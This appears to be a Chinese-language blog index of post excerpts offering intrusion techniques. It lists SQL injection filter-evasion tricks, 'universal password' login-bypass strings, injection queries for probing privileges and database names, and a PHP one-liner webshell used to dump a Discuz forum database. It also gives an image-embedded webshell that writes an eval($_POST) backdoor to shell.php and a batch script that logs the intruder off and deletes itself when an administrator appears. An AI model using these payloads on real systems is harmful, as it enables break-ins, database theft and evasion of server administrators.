T_T

摘要： 当我们对一个运行IDS系统的服务器进行SQL注射时，我们往往会遇到很大的麻烦，因为我们的注射语句被过滤了，如何规避这种检测手段就成了一门新的技术，本文就对此规避技术提出十一条思路和方法，与大家商戳。一、 运用编码技术绕过，如URLEncode编码，ASCII编码绕过。如or 1=1即%6f%72%20%31%3d%31Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)二、 通过空格绕过，如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如or’swords’=‘swords’，由于mssql的松散性，我们可以把or ‘swords’之间的空格去掉 阅读全文

摘要： 条件限制写不了大马，只有一个一句话，其实要实现什么完全够了，只是很不直观方便啊，比如tuo库。这儿利用的是马儿的专家模式（自己写代码）。ini_set(‘display_errors’, 1);set_time_limit(0);error_reporting(E_ALL);$connx = mysql_connect(“:/var/tmp/mysql.sock”, “forum”, “xx!!xx3″) or die(“Could not connect: ” . mysql_error());mysql_select_db(“discuz”,$connx) or die(“Could no 阅读全文

摘要： 检测管理员上线就注销自已：12345@echo off:checkchoice /C YN /T 10 /D Yquser find "#16" && del xx.bat logoffgoto check每次运行这个 bat 的时候先quser 一下，看当前的会话id 是多少，然后加1 每连接一次就会加1。以上适应使用管理员帐号时。下面适应使用拥有管理员权限的其他帐号：123@echo offlogoff 1del log.batlogoff后面的1改成自己登陆的ID号,用query user查看还有一个是防止嗅探过程中把服务器挂掉：12345678910 阅读全文

摘要： 服务器只有一个站,又找不到注入点怎么办? 你可以试试在搜索框,登陆,任何框框里放个单引号,看看是否报错 初级部分 加个单引号',后面随便,随便填个密码,点击登陆 典型的SQL注入判断权限: ' and user>0-- 明显的sa权限获取数据库名字: ' and db_name()>0-- 很容易获取到,数据库名,如果不是sa权限 ,比如public权限,我们可以通过差异备份获取shell,但本教程不必了下面开始高级部分:就不截图了,就是把下面代码放入登录框执行一:建表,3个字段';c... 阅读全文

摘要： asp aspx万能密码1："or "a"="a2： ')or('a'='a3：or 1=1--4：'or 1=1--5：a'or' 1=1--6："or 1=1--7：'or'a'='a8："or"="a'='a9：'or''='10：'or'='or'11: 1 or '1'='1'=112: 1 or ' 阅读全文

摘要： 用来替换文件的replace，连正在使用的文件也能替换。非常无敌。 比如：在C：\下建一个目录，c：\aaa 然后复制一首mp3到c:\aaa并命名为c:\aaa\a.mp3 然后再复制另一首歌到C:\a.mp3 然后用media player 播放c:\aaa\a.mp3在命令提示符下输入：replace c:\a.mp3 c:\aaa 过一会，是不是播放的歌已变为另一首。 用这个命令来替换系统文件真是太爽了，并且XP的系统文件保护也对它无效。 再也不用到安全模式下去替换文件了 格式 REPLACE [drive1:][path1]filename [drive2:][path2] [/A] 阅读全文

摘要： DEL /F /A /Q \\?\%1RD /S /Q \\?\%1另存为"统统删除.bat"然后，要把要删除的文件或者目录拖放到这个bat文件的图标上就可以删除了。万事OK，不信大家试试啊。有了这个，还要其它辅助软件干什么。呵呵 阅读全文

摘要： 代码:<object runat=server id=oScriptlhn scope=pageclassid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object><%if err then%><object runat=server id=oScriptlhn scope=pageclassid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object><%end ifrespons 阅读全文

摘要： Nginx那个0day（出来有几天了，因为介绍的网站很多，所以当时就没转载）先合并一张PHP一句话图片马，合并方法：①、DOS合并：copy1.gif/b+1.txt/aasp.gif②、用edjpgcom，进行图片和一句话木马的合并，一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval(\$_POST[akt]);?>")?>"图片随便找一张.一句话:<?phpfputs(fopen('shell.php','w' 阅读全文

摘要： 1.如何判断权限是否为rootand ord(mid(user(),1,1))=114 返回正常 即为ROOT权限,2.注入点只有一个地方显示数据,如何查询多条数据假设这个注入点 只有3 如何显示多条数据?使用concat函数。格式concat(user(),database(),version(),@@datadir)root@localhosthyxy5.1.40-communityC:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\ 这样不好看? 可以自己加个空格oot@loca 阅读全文